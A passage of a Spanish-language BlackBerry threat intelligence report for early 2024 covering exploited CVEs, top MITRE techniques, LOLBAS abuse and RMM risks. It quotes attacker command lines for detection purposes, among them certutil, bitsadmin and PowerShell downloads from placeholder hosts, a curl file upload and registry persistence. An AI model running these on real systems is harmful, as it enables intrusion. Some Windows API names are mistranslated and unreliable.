Se trata de una elusión de la función de seguridad de los archivos de acceso directo a Internet que afecta a los archivos de acceso directo a Internet de Microsoft Windows. Requiere la interacción del usuario para eludir las comprobaciones de seguridad. Tras la interacción inicial, provoca una serie de ejecuciones que, en última instancia, conducen a la víctima a un script malicioso. Un grupo de amenazas utilizó esta vulnerabilidad de día cero para desplegar la RAT DarkMe.
Vulnerabilidad de elevación del núcleo de Windows
CVE-2024-21338 (7.8 Alto)
Elevación de privilegios
La explotación de esta vulnerabilidad permite al atacante obtener privilegios del sistema. El Grupo Lazarus (un grupo de amenazas norcoreano) explotó esta vulnerabilidad de día cero encontrada en el controlador de Windows AppLocker (appid.sys) para obtener acceso a nivel de kernel.
Exploit de GoAnywhere MFT de Fortra
CVE-2024-0204 (9.8 Crítico)
Anulación de autenticación
En enero, Fortra publicó un aviso de seguridad compartiendo el bypass crítico que afectaba a un producto GoAnywhere MFT. Esta vulnerabilidad se encontró en GoAnywhere MFT de Fortra anterior a la versión 7.4.1. La explotación permite a un usuario no autorizado crear un usuario administrador a través del portal de administración.
Vulnerabilidad de lectura arbitraria de archivos en Jenkins
CVE-2024-23897 (9.7 Crítico)
Ejecución remota de código
Las versiones anteriores de Jenkins - hasta la 2.441 y anteriores, LTS 2.426.2 - contienen una vulnerabilidad encontrada en el sistema de archivos del controlador Jenkins a través de la interfaz de línea de comandos incorporada. Se encuentra dentro de la biblioteca args4j, que tiene una característica que reemplaza un carácter "@" seguido de una ruta de archivo en un argumento con el contenido del archivo.34 Esto, a su vez, permite a un atacante leer archivos arbitrarios en el sistema de archivos, y potencialmente podría conducir a la ejecución remota de código.
Vulnerabilidad de ConnectWise ScreenConnect 23.9.7
CVE-2024-1709 (10 Crítico); CVE-2024-1708 (8.4 Alto)
Ejecución remota de código
Esta vulnerabilidad afecta al producto ConnectWise ScreenConnect 23.9.7. Se ha visto a atacantes aprovechar estas dos vulnerabilidades en la naturaleza. Ambas funcionan conjuntamente, ya que CVE-2024-1709 (una vulnerabilidad crítica de omisión de autenticación) permite al atacante crear cuentas administrativas y explotar CVE-2024-1708 (una vulnerabilidad de paso de ruta), permitiendo el acceso no autorizado a los archivos y directorios de la víctima.
Técnicas comunes de MITRE
Comprender las técnicas de alto nivel de los grupos de amenazas puede ayudar a decidir qué técnicas de detección deben priorizarse. BlackBerry observó las siguientes 20 técnicas principales utilizadas por los actores de amenazas en este periodo de notificación.
Una flecha hacia arriba en la última columna indica que el uso de la técnica ha aumentado desde nuestro último informe; una flecha hacia abajo indica que el uso ha disminuido, y un símbolo igual (=) significa que la técnica se mantiene en la misma posición que en nuestro último informe.
| Nombre de la técnica | Técnica ID | Nombre de la táctica | Último informe | Cambia |
|---|---|---|---|---|
|
Inyección de procesos
|
T1055
|
Escalada de privilegios, evasión de defensas
|
1
|
=
|
|
Descubrimiento de información del sistema
|
T1082
|
Descubrimiento
|
3
|
↑
|
|
Carga lateral de DLL
|
T1574.002
|
Persistencia, escalada de privilegios, evasión de defensas
|
4
|
↑
|
|
Captura de entrada
|
T1056
|
Acceso a credenciales, recogida
|
2
|
↓
|
|
Descubrimiento de software de seguridad
|
T1518.001
|
Descubrimiento
|
NA
|
↑
|
|
Enmascaramiento
|
T1036
|
Defensa Evasión
|
10
|
↑
|
|
Descubrimiento de archivos y directorios
|
T1083
|
Descubrimiento
|
13
|
↑
|
|
Descubrimiento de procesos
|
T1057
|
Descubrimiento
|
19
|
↑
|
|
Protocolo de la capa de aplicación
|
T1071
|
Mando y control
|
6
|
↓
|
|
Claves de ejecución del registro/Carpeta de inicio
|
T1547.001
|
Persistencia, escalada de privilegios
|
9
|
↓
|
|
Protocolo de capa no aplicativa
|
T1095
|
Mando y control
|
5
|
↓
|
|
Descubrimiento remoto del sistema
|
T1018
|
Descubrimiento
|
15
|
↑
|
|
Descubrimiento de ventanas de aplicación
|
T1010
|
Descubrimiento
|
NA
|
↑
|
|
Embalaje de software
|
T1027.002
|
Defensa Evasión
|
NA
|
↑
|
|
Tarea/trabajo programado
|
T1053
|
Ejecución, persistencia, escalada de privilegios
|
8
|
↓
|
|
Servicio Windows
|
T1543.003
|
Persistencia, escalada de privilegios
|
12
|
↓
|
|
Desactivar o modificar herramientas
|
T1562.001
|
Defensa Evasión
|
18
|
↑
|
|
Intérprete de comandos y secuencias de comandos
|
T1059
|
Ejecución
|
7
|
↓
|
|
Archivos o información ofuscados
|
T1027
|
Defensa Evasión
|
NA
|
↑
|
|
Replicación a través de soportes extraíbles
|
T1091
|
Acceso inicial, movimiento lateral
|
11
|
↓
|
| Técnica ID | |
|---|---|
| Inyección de procesos |
T1055
|
| Descubrimiento de información del sistema |
T1082
|
| Carga lateral de DLL |
T1574.002
|
| Captura de entrada |
T1056
|
| Descubrimiento de software de seguridad |
T1518.001
|
| Enmascaramiento |
T1036
|
| Descubrimiento de archivos y directorios |
T1083
|
| Descubrimiento de procesos |
T1057
|
| Protocolo de la capa de aplicación |
T1071
|
| Claves de ejecución del registro/Carpeta de inicio |
T1547.001
|
| Protocolo de capa no aplicativa |
T1095
|
| Descubrimiento remoto del sistema |
T1018
|
| Descubrimiento de ventanas de aplicación |
T1010
|
| Embalaje de software |
T1027.002
|
| Tarea/trabajo programado |
T1053
|
| Servicio Windows |
T1543.003
|
| Desactivar o modificar herramientas |
T1562.001
|
| Intérprete de comandos y secuencias de comandos |
T1059
|
| Archivos o información ofuscados |
T1027
|
| Replicación a través de soportes extraíbles |
T1091
|
| Nombre de la táctica | |
|---|---|
| Inyección de procesos |
Escalada de privilegios, evasión de defensas
|
| Descubrimiento de información del sistema |
Descubrimiento
|
| Carga lateral de DLL |
Persistencia, escalada de privilegios, evasión de defensas
|
| Captura de entrada |
Acceso a credenciales, recogida
|
| Descubrimiento de software de seguridad |
Descubrimiento
|
| Enmascaramiento |
Defensa Evasión
|
| Descubrimiento de archivos y directorios |
Descubrimiento
|
| Descubrimiento de procesos |
Descubrimiento
|
| Protocolo de la capa de aplicación |
Mando y control
|
| Claves de ejecución del registro/Carpeta de inicio |
Persistencia, escalada de privilegios
|
| Protocolo de capa no aplicativa |
Mando y control
|
| Descubrimiento remoto del sistema |
Descubrimiento
|
| Descubrimiento de ventanas de aplicación |
Descubrimiento
|
| Embalaje de software |
Defensa Evasión
|
| Tarea/trabajo programado |
Ejecución, persistencia, escalada de privilegios
|
| Servicio Windows |
Persistencia, escalada de privilegios
|
| Desactivar o modificar herramientas |
Defensa Evasión
|
| Intérprete de comandos y secuencias de comandos |
Ejecución
|
| Archivos o información ofuscados |
Defensa Evasión
|
| Replicación a través de soportes extraíbles |
Acceso inicial, movimiento lateral
|
| Último informe | |
|---|---|
| Inyección de procesos |
1
|
| Descubrimiento de información del sistema |
3
|
| Carga lateral de DLL |
4
|
| Captura de entrada |
2
|
| Descubrimiento de software de seguridad |
NA
|
| Enmascaramiento |
10
|
| Descubrimiento de archivos y directorios |
13
|
| Descubrimiento de procesos |
19
|
| Protocolo de la capa de aplicación |
6
|
| Claves de ejecución del registro/Carpeta de inicio |
9
|
| Protocolo de capa no aplicativa |
5
|
| Descubrimiento remoto del sistema |
15
|
| Descubrimiento de ventanas de aplicación |
NA
|
| Embalaje de software |
NA
|
| Tarea/trabajo programado |
8
|
| Servicio Windows |
12
|
| Desactivar o modificar herramientas |
18
|
| Intérprete de comandos y secuencias de comandos |
7
|
| Archivos o información ofuscados |
NA
|
| Replicación a través de soportes extraíbles |
11
|
| Cambia | |
|---|---|
| Inyección de procesos |
=
|
| Descubrimiento de información del sistema |
↑
|
| Carga lateral de DLL |
↑
|
| Captura de entrada |
↓
|
| Descubrimiento de software de seguridad |
↑
|
| Enmascaramiento |
↑
|
| Descubrimiento de archivos y directorios |
↑
|
| Descubrimiento de procesos |
↑
|
| Protocolo de la capa de aplicación |
↓
|
| Claves de ejecución del registro/Carpeta de inicio |
↓
|
| Protocolo de capa no aplicativa |
↓
|
| Descubrimiento remoto del sistema |
↑
|
| Descubrimiento de ventanas de aplicación |
↑
|
| Embalaje de software |
↑
|
| Tarea/trabajo programado |
↓
|
| Servicio Windows |
↓
|
| Desactivar o modificar herramientas |
↑
|
| Intérprete de comandos y secuencias de comandos |
↓
|
| Archivos o información ofuscados |
↑
|
| Replicación a través de soportes extraíbles |
↓
|
Utilizando MITRE D3FEND™, el equipo de Investigación e Inteligencia de Amenazas de BlackBerry elaboró una lista completa de contramedidas para las técnicas observadas durante este periodo de notificación, que está disponible en nuestro GitHub público.
Las tres técnicas principales son procedimientos bien conocidos utilizados por los adversarios para recopilar información clave para llevar a cabo ataques con éxito. La sección Contramedidas aplicadas contiene algunos ejemplos de su uso y alguna información útil que conviene vigilar.
El impacto del conjunto de técnicas y tácticas puede verse en el gráfico siguiente:
La táctica más prevalente en este periodo es la evasión de la defensa, que representa el 24% del total de las tácticas observadas durante este periodo, seguida del descubrimiento , con un 23%, y la escalada de privilegios, con un 21%.
Contramedidas aplicadas a las técnicas del MITRE señaladas
-
Descubrimiento de software de seguridad - T1518.001
Esta popular técnica permite a los actores de ciberamenazas encontrar la lista de programas de seguridad, configuraciones y sensores instalados en un sistema o entorno en la nube objetivo. Esto es muy importante para un adversario que espera pasar desapercibido. Por ejemplo, si un grupo malicioso ejecuta uno de los comandos enumerados a continuación en un sistema comprometido y detecta que el entorno ya cuenta con seguridad para detectar actividades maliciosas, a menudo abortará la operación. En otros casos, los grupos más avanzados y persistentes pueden diferenciar entre las aplicaciones de seguridad y encontrar una forma de sortear las aplicaciones más débiles. Esto puede dar lugar a que un adversario se haga con el control de un sistema o entorno en la nube.
A continuación se muestran líneas de comandos que un atacante podría utilizar para evaluar su seguridad:
- netsh firewall show
- netsh.exe volcado de interfaz
- findstr /s /m /i "defender" *.*
- Lista de tareas /v
- Módulo Powershell Empire Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
-
Enmascaramiento - T1036
Se trata de una sofisticada táctica de ciberamenazas empleada por los atacantes para disfrazar sus actividades y eludir la detección. Por ejemplo, utilizando un nombre, icono y metadatos falsos, las acciones dañinas pueden camuflarse fácilmente como operaciones estándar del sistema. Hacerse pasar por un archivo o proceso legítimo puede engañar a los usuarios y al software de seguridad para que abran o guarden un archivo falso, lo que puede provocar la penetración en el sistema y la pérdida de datos. (Encontrará más detalles sobre cómo identificar un método de enmascaramiento en nuestra sección CylanceMDR Observaciones de este informe).
He aquí un desglose de los métodos de enmascaramiento más comunes:
- Renombrar ejecutables: Los atacantes suelen cambiar el nombre de los ejecutables maliciosos para simular que son un programa legítimo del sistema (por ejemplo, svchost.exe, explorer.exe) y pueden cambiar o añadir otra extensión falsa para ocultar el tipo de archivo real, como .txt.doc o .exe.config. El objetivo es engañar a los usuarios y a las herramientas de seguridad cuando ejecutan comprobaciones manuales o automáticas del sistema, de modo que el usuario ejecute o intente abrir el archivo malicioso sin hacer caso a las advertencias del sistema.
- Imitar rutas de archivos: En un directorio de confianza común (por ejemplo: System32), hay menos observación y detección por parte de las herramientas de seguridad. Por esa razón, los atacantes suelen colocar archivos maliciosos en estos directorios y darles nombres de procesos legítimos para ocultarlos.
- Firma de código no válida: Los atacantes pueden firmar su malware con certificados digitales no válidos o robados para eludir las medidas de seguridad. Esto engaña a los sistemas y a los usuarios para que confíen en los archivos o procesos maliciosos haciéndolos aparecer como si estuvieran verificados por una fuente legítima. Los atacantes pueden utilizar certificados caducados, revocados u obtenidos de forma fraudulenta. La identificación de estas tácticas requiere procesos sólidos de validación de certificados y sistemas de alerta que puedan señalar datos de certificados inusuales o validaciones fallidas. Por ejemplo, para hacer pasar cmd.exe por una aplicación de calculadora:
Copie c:\windows\system32\cmd.exe C:\calc.exe
-
Descubrimiento de archivos y directorios - T1083
El descubrimiento de archivos y directorios se utiliza con frecuencia durante la etapa de reconocimiento de un atacante para obtener información sobre el entorno de destino, identificar archivos potenciales para la exfiltración o manipulación, localizar información confidencial o apoyar las etapas posteriores de una cadena de ataque.
A continuación se indican las líneas de comando utilizadas para esta técnica:
- 'dir /s C:\path\to\directory' - Utiliza la utilidad dir para listar recursivamente archivos y directorios en un determinado directorio y sus subdirectorios.
- tree /F' - Utiliza la utilidad tree para mostrar los nombres de los archivos de cada directorio junto con el árbol de directorios.
- 'powershell.exe -c "Get-ChildItem C:\path\to\directory"' - Implementa el cmdlet Get-ChildItem en powershell, que recupera una lista de archivos y directorios en la ruta especificada.
Los actores de amenazas también pueden utilizar funciones nativas de la API de Windows para enumerar archivos y directorios. Las siguientes son funciones de la API de Windows utilizadas por los actores de amenazas:
- BuscarPrimerArchivo - Recupera información sobre el primer archivo o directorio que coincida con el patrón de nombre de archivo o directorio especificado.
- BuscarSiguienteArchivo - Continúa una búsqueda de archivos iniciada por una llamada anterior a la función BuscarPrimerArchivo.
- RutaArchivoExiste - Comprueba si existe el directorio o archivo especificado.
-
Protocolo de capa de aplicación - T1071
Los actores de amenazas buscan constantemente nuevas formas de ocultar sus acciones dentro del tráfico legítimo para evitar ser detectados. La manipulación del protocolo de capa de aplicación (T1071) es una técnica muy popular. Durante los tres primeros meses de 2024, esta técnica fue una de las cinco tácticas más empleadas por los ciberdelincuentes. Al explotar vulnerabilidades en protocolos de red de uso común como HTTP, HTTPS, DNS o SMB, los adversarios pueden mezclar actividades maliciosas sin problemas en el tráfico de red rutinario.
Esta técnica puede utilizarse para filtrar datos, permitir la comunicación C2 y moverse lateralmente dentro de redes comprometidas. Por ejemplo, los adversarios pueden codificar datos sensibles en las cabeceras HTTP o aprovechar la tunelización DNS para eludir las defensas de la red y extraer información sin levantar sospechas. La naturaleza sigilosa de la manipulación de los protocolos de la capa de aplicación plantea importantes retos a la detección y atribución, ya que muchas herramientas de seguridad tradicionales tienen dificultades para diferenciar entre la actividad normal y la maliciosa en la red.
Dada la prevalencia y sofisticación de esta técnica, las organizaciones deben adoptar medidas proactivas para reforzar sus defensas. Una solución de monitorización de red robusta debe ser capaz de detectar patrones de tráfico anómalos y garantizar que el comportamiento sospechoso asociado a la manipulación del protocolo de capa de aplicación se diferencia con precisión de la actividad rutinaria del usuario.
Además, el mantenimiento de parches de seguridad actualizados para protocolos y aplicaciones de red puede mitigar vulnerabilidades y exploits conocidos. Mediante la implantación de soluciones de detección y respuesta en puntos terminales (EDR), las organizaciones pueden mejorar su capacidad para identificar y responder a actividades maliciosas perpetradas mediante la manipulación de protocolos de la capa de aplicación, reforzando así su postura general de ciberseguridad.
Los siguientes son comandos APL utilizados por los actores de amenazas: curl -F "file=@C:\sers\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1' -
Claves de Ejecución del Registro / Carpeta de Inicio - T1547.001
La manipulación de las claves de ejecución del registro/carpeta de inicio es una técnica utilizada por los adversarios para establecer la persistencia en los sistemas comprometidos. Esta técnica ocupó un lugar destacado entre las principales tácticas utilizadas por los actores de ciberamenazas en este periodo. Al manipular las claves del Registro de Windows o añadir entradas maliciosas a las carpetas de inicio, los ciberdelincuentes se aseguran de que sus cargas maliciosas se ejecuten automáticamente al arrancar el sistema o al iniciar sesión, lo que facilita el control permanente de los sistemas infectados.
Esta técnica permite a los adversarios desplegar una amplia gama de programas maliciosos, incluidos backdoors, keyloggers y ransomware, manteniendo así un acceso persistente a los sistemas comprometidos. Los agresores aprovechan las funcionalidades nativas de Windows para eludir la detección. El abuso de las configuraciones legítimas del sistema hace que la detección y mitigación de estas amenazas resulte más difícil para las soluciones antivirus tradicionales.
Para contrarrestar la amenaza que supone la manipulación de las claves de ejecución del registro y las carpetas de inicio, las organizaciones deben adoptar un enfoque multicapa de la seguridad de los puntos finales:
- Supervise y audite regularmente las claves del Registro de Windows y las carpetas de inicio para detectar cambios no autorizados indicativos de actividad maliciosa.
- Implemente listas blancas de aplicaciones para ayudar a evitar ejecutables no autorizados.
- Establezca controles de gestión de privilegios para restringir la capacidad de los adversarios de manipular configuraciones críticas del sistema.
- Lleve a cabo programas de formación y concienciación de los usuarios para que los empleados puedan reconocer y notificar elementos de inicio o modificaciones del registro sospechosos.
- Mejorar las capacidades generales de detección y respuesta a las amenazas.
Algunos comandos que hay que vigilar son:
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%\Microsoft\Windows\Menu Inicio\Programas\Inicio\archivo[.]txt"
CylanceMDR Datos
Esta sección del informe destaca varias de las detecciones de amenazas más comunes observadas en entornos de clientes de CylanceMDR .
CylanceMDRanteriormente conocido como CylanceGUARD®, es un servicio de detección y respuesta gestionadas (MDR) basado en suscripción de BlackBerry que proporciona supervisión 24x7 y ayuda a las organizaciones a detener ciberamenazas sofisticadas que aprovechan las lagunas de los programas de seguridad del cliente. El equipo de CylanceMDR rastreó miles de alertas durante este periodo. A continuación, desglosamos la telemetría por regiones para proporcionar información adicional sobre el panorama actual de las amenazas.
CylanceMDR Observaciones
Durante este periodo, el equipo de CylanceMDR observó que Certutil generaba mucha actividad de detección en el centro de operaciones de seguridad (SOC), en concreto, la técnica relacionada con el cambio de nombre de herramientas como Certutil (por ejemplo: "Possible Certutil Renamed Execution"). Hubo un pico de detecciones relacionadas con esto en todas las regiones geográficas en las que BlackBerry protege a los clientes.
En nuestro informe anterior, hablábamos de cómo los actores de amenazas abusan o hacen un mal uso de las utilidades de binarios y scripts que viven fuera del terreno (LOLBAS) como Certutil: a menudo cambian el nombre de utilidades legítimas (como Certutil) en un intento de evadir las capacidades de detección. Esto se conoce como enmascaramiento y tiene el ID de técnica de MITRE: T1036.003. Los defensores deben desplegar capacidades de detección robustas para minimizar el riesgo de técnicas de evasión como el enmascaramiento. Por ejemplo, la creación de una regla de detección que sólo se activa cuando ve el comando Certutil (junto con cualquier opción/argumento del que se haya abusado con esta herramienta) puede ser fácilmente evadida.
Por ejemplo, los dos comandos siguientes:
certutil.exe -urlcache -split -f "hxxps://bbtest/archivo-malo[.]txt" malo[.]txt
Si sus capacidades de detección sólo se basan en ver el comando certutil (junto con sus opciones), esto se detectará, pero se considerará una protección débil, ya que podría evadirse fácilmente.
outlook.exe -urlcache -split -f "hxxps://bbtest/archivo-malo[.]txt" malo[.]txt
En este caso, hemos renombrado certutil.exe a outlook.exe y esto evadiría completamente la detección (si se utiliza la lógica comentada anteriormente).
Una solución mejor sería garantizar que los metadatos del archivo/proceso ejecutable portátil (PE), como el nombre de archivo original (el nombre de archivo interno proporcionado en tiempo de compilación), se recopilen e integren en las capacidades de detección. Un desajuste entre el nombre del archivo en el disco y los metadatos PE del binario es un buen indicador de que un binario fue renombrado después del tiempo de compilación.
Actividad de LOLBAS
Durante este periodo, hemos observado un cambio en la actividad de LOLBAS en el entorno de nuestros clientes:
- Aumento de las detecciones relacionadas con regsvr32.exe.
- Disminución de la actividad relacionada con mshta.exe.
- Un gran aumento de las detecciones relacionadas con bitsadmin.exe.
A continuación se ilustra un ejemplo de uso malintencionado de LOLBAS (excluidos los que se compartieron durante el último periodo de notificación).
Archivo: Bitsadmin.exe
Mitre: T1197 | T1105
Cómo se puede abusar de él:
- Descarga/subida desde o hacia un host malicioso (transferencia de herramientas Ingress)
- Puede utilizarse para ejecutar procesos maliciosos
Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
Archivo: mofcomp.exe
Mitre: T1218
Cómo se puede abusar de él:
- Puede utilizarse para instalar scripts maliciosos de formato de objeto gestionado (MOF)
- Las declaraciones MOF son analizadas por la utilidad mofcomp.exe y añadirán las clases e instancias de clase definidas en el archivo al repositorio WMI.
Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
Los proveedores de servicios de TI gestionados (MSP) utilizan con frecuencia herramientas de supervisión y gestión remotas (RMM) para supervisar a distancia los terminales de los clientes. Lamentablemente, las herramientas RMM también permiten a los actores de amenazas acceder a esos mismos sistemas. Estas herramientas ofrecen una gran cantidad de funciones de administración y permiten a los actores de amenazas pasar desapercibidos utilizando herramientas de confianza y aprobadas.
En 2023, el abuso de la herramienta RMM fue un punto focal debido a los informes relacionados con Scattered Spider, un grupo de ciberataques que se cree que está detrás de los ataques a MGM Resorts International en septiembre de 2023. Los miembros de Scattered Spider son considerados sofisticados expertos en ingeniería social y despliegan diversas técnicas, como ataques de intercambio de SIM, phishing y push bombing. Han utilizado una serie de herramientas de RMM durante sus ataques, tales como:
- Splashtop
- TeamViewer
- ScreenConnect
En el primer periodo de notificación de 2024, la atención sobre las herramientas RMM se ha mantenido alta desde el descubrimiento de dos vulnerabilidades en ConnectWise ScreenConnect (todas las versiones inferiores a 23.9.8). Los detalles del CVE pueden verse a continuación:
CVE-2024-1709
CWE-288: Evasión de autenticación utilizando una ruta o canal alternativo.
CVE-2024-1708
CWE-22: Limitación incorrecta de una ruta a un directorio restringido ("path traversal").
El siguiente gráfico ilustra las herramientas RMM más comunes observadas durante este periodo de notificación.
Durante nuestro análisis, observamos que muchos clientes utilizan varias herramientas RMM, lo que aumenta la superficie de ataque y el riesgo de la organización. Entre las medidas de mitigación sugeridas se incluyen:
Auditoría de herramientas de acceso remoto (herramientas RMM)
- Identificar las herramientas RMM utilizadas actualmente en el entorno.
- Confirmar que están aprobados en el entorno.
- Si utiliza varias herramientas RMM, determine si pueden consolidarse. Reducir el número de herramientas diferentes utilizadas reduce el riesgo.
Desactivar puertos y protocolos
- Bloquee la comunicación de red entrante y saliente a puertos de uso común asociados con herramientas de acceso remoto no aprobadas.
Auditoría rutinaria de registros
- Detectar el uso anormal de herramientas de acceso remoto.
Parcheado
- Garantizar la revisión periódica de las vulnerabilidades asociadas a las herramientas RMM utilizadas, actualizándolas en caso necesario.
- El software accesible a través de Internet, como las herramientas RMM, debe ser siempre una prioridad a la hora de realizar ciclos regulares de parches.
Segmentación de la red
- Minimice el movimiento lateral segmentando la red, limitando el acceso a dispositivos y datos.
Etiquetado de dispositivos
- Averigüe si su proveedor de seguridad ofrece opciones para etiquetar los dispositivos que utilizan herramientas RMM. Si es así, habilítelo para garantizar la visibilidad del SOC. Algunos proveedores ofrecen opciones para dejar una nota/etiqueta que identifique las herramientas/actividades aprobadas, lo que ayuda enormemente a los analistas durante las investigaciones.
Carga de memoria RMM
- Utilice software de seguridad que pueda detectar accesos remotos que sólo se cargan en la memoria.
Conclusión
Este informe de 90 días está diseñado para ayudarle a mantenerse informado y preparado ante futuras amenazas. Al enfrentarse a un panorama de amenazas a la ciberseguridad en rápida evolución, resulta útil estar al día de las últimas noticias sobre seguridad en su sector, región geográfica y cuestiones clave. Estas son nuestras principales conclusiones de enero a marzo de 2024:
- A escala mundial, BlackBerry detuvo 37.000 ataques diarios dirigidos a nuestros inquilinos, según nuestra telemetría interna Attacks Stopped. Hemos observado un gran aumento del malware único dirigido a nuestros inquilinos y clientes, un 40% por minuto más que en el período del informe anterior. Esto podría sugerir que los actores de las amenazas están tomando medidas exhaustivas para dirigirse cuidadosamente a sus víctimas.
- Los infosecuestradores ocuparon un lugar destacado en las secciones de Infraestructuras críticas, Empresas comerciales y Principales amenazas. Esto sugiere que los datos confidenciales y privados son muy buscados por los actores de amenazas en todas las regiones geográficas y sectores.
- Como se destaca en nuestra nueva sección de ransomware, que describe los grupos de ransomware más notables, el ransomwarese dirige cada vez más a las infraestructuras críticas, en particular a la sanidad.
- La explotación de CVE se ha expandido rápidamente en el último año y continuará haciéndolo. BlackBerry registró casi 9.000 nuevos CVE divulgados por el NIST en los últimos tres meses. Además, más del 56% de estas vulnerabilidades reveladas obtuvieron una puntuación superior a 7,0 en criticidad. Las vulnerabilidades relacionadas con software legítimo muy utilizado, como ConnectWise ScreenConnect, GoAnywhere y varios productos Ivanti auténticos, han sido utilizadas como armas por los autores de amenazas a un ritmo alarmante para distribuir toda una serie de programas maliciosos en los equipos de las víctimas sin parches.
- Los engaños políticos mediante deepfakes y desinformación se extienden cada vez más a través de las redes sociales y seguirán siendo un problema en el futuro, sobre todo en relación con la invasión rusa de Ucrania, el conflicto que se desarrolla en Oriente Próximo y las próximas elecciones presidenciales estadounidenses que tendrán lugar en noviembre.
Encontrará más información sobre las principales amenazas y defensas en materia de ciberseguridad en el blogBlackBerry .
Agradecimientos
Este informe representa los esfuerzos de colaboración de nuestros talentosos equipos e individuos. En particular, nos gustaría expresar nuestro reconocimiento:
Apéndice: Amenazas para las infraestructuras críticas y las empresas comerciales
ransomware 8Base: Un grupo de ransomware particularmente agresivo visto por primera vez en 2023. Ha sido extremadamente activo en su corta historia, a menudo dirigido a víctimas en Norteamérica y países de LATAM. El grupo de amenazas utiliza una combinación de tácticas para lograr el acceso inicial y, a continuación, también puede explotar vulnerabilidades en los sistemas de la víctima para maximizar su potencial de pago.
Amadey (Bot Amadey): Botnet multifuncional que tiene un diseño modular. Una vez que aterriza en el dispositivo de una víctima, Amadey puede recibir órdenes de sus servidores C2 para ejecutar diversas tareas, a saber, robar información y desplegar cargas útiles adicionales.
Buhti: Buhti, una operación de ransomware relativamente nueva, utiliza variantes de las familias de ransomware filtradas LockBit 3.0 (también conocido como LockBit Black) y Babuk para atacar sistemas Windows y Linux. Además, se sabe que Buhti utiliza una utilidad de exfiltración de datos personalizada escrita en el lenguaje de programación "Go" diseñada para robar archivos con extensiones específicas. También se ha visto a los operadores del ransomware explotar con rapidez otros graves fallos que afectaban a la aplicación de intercambio de archivos Aspera Faspex de IBM (CVE-2022-47986) y a la vulnerabilidad PaperCut, recientemente parcheada (CVE-2023-27350).
LummaStealer (LummaC2): Infostealer basado en C que se dirige a empresas comerciales y organizaciones de infraestructuras críticas, centrándose en la exfiltración de datos privados y confidenciales del dispositivo de la víctima. Este infostealer, que suele promocionarse y distribuirse a través de foros clandestinos y grupos de Telegram, a menudo utiliza troyanos y spam para propagarse.
PrivateLoader: Una conocida familia de downloaders que ha estado en la naturaleza desde 2021, dirigida principalmente a empresas comerciales en América del Norte. PrivateLoader (como su nombre indica) es un mecanismo de acceso inicial que facilita el despliegue de una plétora de cargas maliciosas en los dispositivos de las víctimas, concretamente infostealers. PrivateLoader opera una red de distribución a través de un servicio clandestino de pago por instalación (PPI) para financiar su uso y desarrollo continuos.
RaccoonStealer: MaaS infostealer. En la naturaleza desde 2019, los creadores de RaccoonStealer han mejorado sus habilidades para evitar el software de seguridad y el software AV tradicional. Según la telemetría interna de BlackBerry, se ha observado a RaccoonStealer atacando a empresas comerciales en América del Norte.
RedLine (RedLine Stealer): Un infostealer de malware ampliamente distribuido en que a menudo se vende a través de MaaS. El principal motivo del grupo de amenazas que distribuye el malware parece ser más el beneficio económico que la política, la destrucción o el espionaje. Por este motivo, RedLine se ha dirigido activamente a diversos sectores y regiones geográficas.
Remcos (RemcosRAT): Una RAT de grado comercial utilizada para controlar remotamente un ordenador o dispositivo. Aunque se anunciaba como software legítimo, el software de vigilancia y control remoto se utilizaba a menudo como troyano de acceso remoto.
SmokeLoader: Un malware comúnmente utilizado con una plétora de capacidades, a saber, el despliegue de otro malware en el dispositivo de la víctima. SmokeLoader ha sido una amenaza recurrente observada por BlackBerry a través de múltiples informes de inteligencia sobre amenazas globales. En el período que abarca este informe, se observó que el malware se dirigía a servicios comerciales y profesionales en Norteamérica.
Vidar (VidarStealer): Un infostealer de productos básicos que ha estado en la naturaleza desde 2018 y se ha convertido en una familia de malware fuertemente armada. Los atacantes han sido capaces de desplegar Vidar explotando vulnerabilidades en el popular software ScreenConnect RRM de ConnectWise. Estos dos CVE, CVE-2024-1708 y CVE-2024-1709, permitieron a los actores de amenazas eludir y acceder a sistemas críticos.